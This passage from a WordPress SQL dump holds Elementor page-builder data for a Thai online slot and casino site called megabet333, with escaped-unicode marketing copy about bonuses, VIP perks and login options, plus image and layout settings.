\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1096,139,'_thumbnail_id','60'),(1097,139,'_elementor_edit_mode','builder'),(1098,139,'_elementor_template_type','wp-page'),(1099,139,'_elementor_version','3.32.5'),(1100,139,'_elementor_pro_version','3.32.3'),(1101,139,'_wp_page_template','default'),(1102,139,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1103,139,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 